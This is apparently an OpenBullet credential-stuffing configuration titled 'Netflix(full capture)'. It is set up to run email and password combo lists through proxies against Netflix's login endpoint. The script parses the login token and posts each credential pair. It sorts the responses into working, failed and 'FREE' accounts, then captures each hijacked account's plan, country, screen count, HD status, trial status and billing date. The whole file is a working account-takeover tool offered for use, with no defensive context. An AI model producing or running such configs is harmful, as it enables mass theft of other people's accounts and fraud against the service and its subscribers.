[SETTINGS]
{
  "Name": "Netflix(full capture)",
  "SuggestedBots": 25,
  "LastModified": "2019-05-19T15:29:12.8886097+04:30",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "TakTir (loliX Encrypted)",
  "Version": "1.2.1.2",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.netflix.com/ph-en/Login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 

PARSE "<SOURCE>" LR "name=\"authURL\" value=\"" "\"" -> VAR "authURL" 

FUNCTION URLEncode "<authURL>" -> VAR "AUTH" 

#Login REQUEST POST "https://www.netflix.com/Login?nextpage=https%3A%2F%2Fwww.netflix.com%2FYourAccount" 
  CONTENT "authURL=<AUTH>&email=<USER>&password=<PASS>&withFields=email%2Cpassword%2CrememberMe%2CnextPage%2CshowPassword&rememberMe=True&flow=websiteSignUp&mode=login&action=loginAction&nextPage=https%3A%2F%2Fwww.netflix.com%2FYourAccount&showPassword=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Referer: https://www.netflix.com/ph-en/Login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\":\"unrecognized_email\"},\"" 
    KEY "\"value\":\"incorrect_password\"}" 
  KEYCHAIN Success OR 
    KEY "\"membershipStatus\":\"CURRENT_MEMBER\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"membershipStatus\":\"NEVER_MEMBER\"" 
    KEY "\"membershipStatus\":\"FORMER_MEMBER\"" 

#Subscription PARSE "<SOURCE>" LR "\"currentPlanName\":\"" "\"" -> CAP "Subscription" 

#Country PARSE "<SOURCE>" LR "\",\"currentCountry\":\"" "\"" -> CAP "Country" 

#DVD PARSE "<SOURCE>" LR "\"isDVD\":" "," -> CAP "DVD" 

#Trial PARSE "<SOURCE>" LR "\"isInFreeTrial\":" "," -> CAP "Trial" 

#Screens PARSE "<SOURCE>" LR "\"maxStreams\":" "," -> CAP "Screens" 

#HD PARSE "<SOURCE>" LR "\"hasHD\":" "," -> CAP "HD" 

#Ultra_HD PARSE "<SOURCE>" LR "\"hasUHD\":" "," -> CAP "UltraHD" 

PARSE "<SOURCE>" LR "\"nextBillingDate\":\"" "\"" -> VAR "Billing" 

FUNCTION Replace "\x2F" "/" "<Billing>" -> CAP "Next Billing" 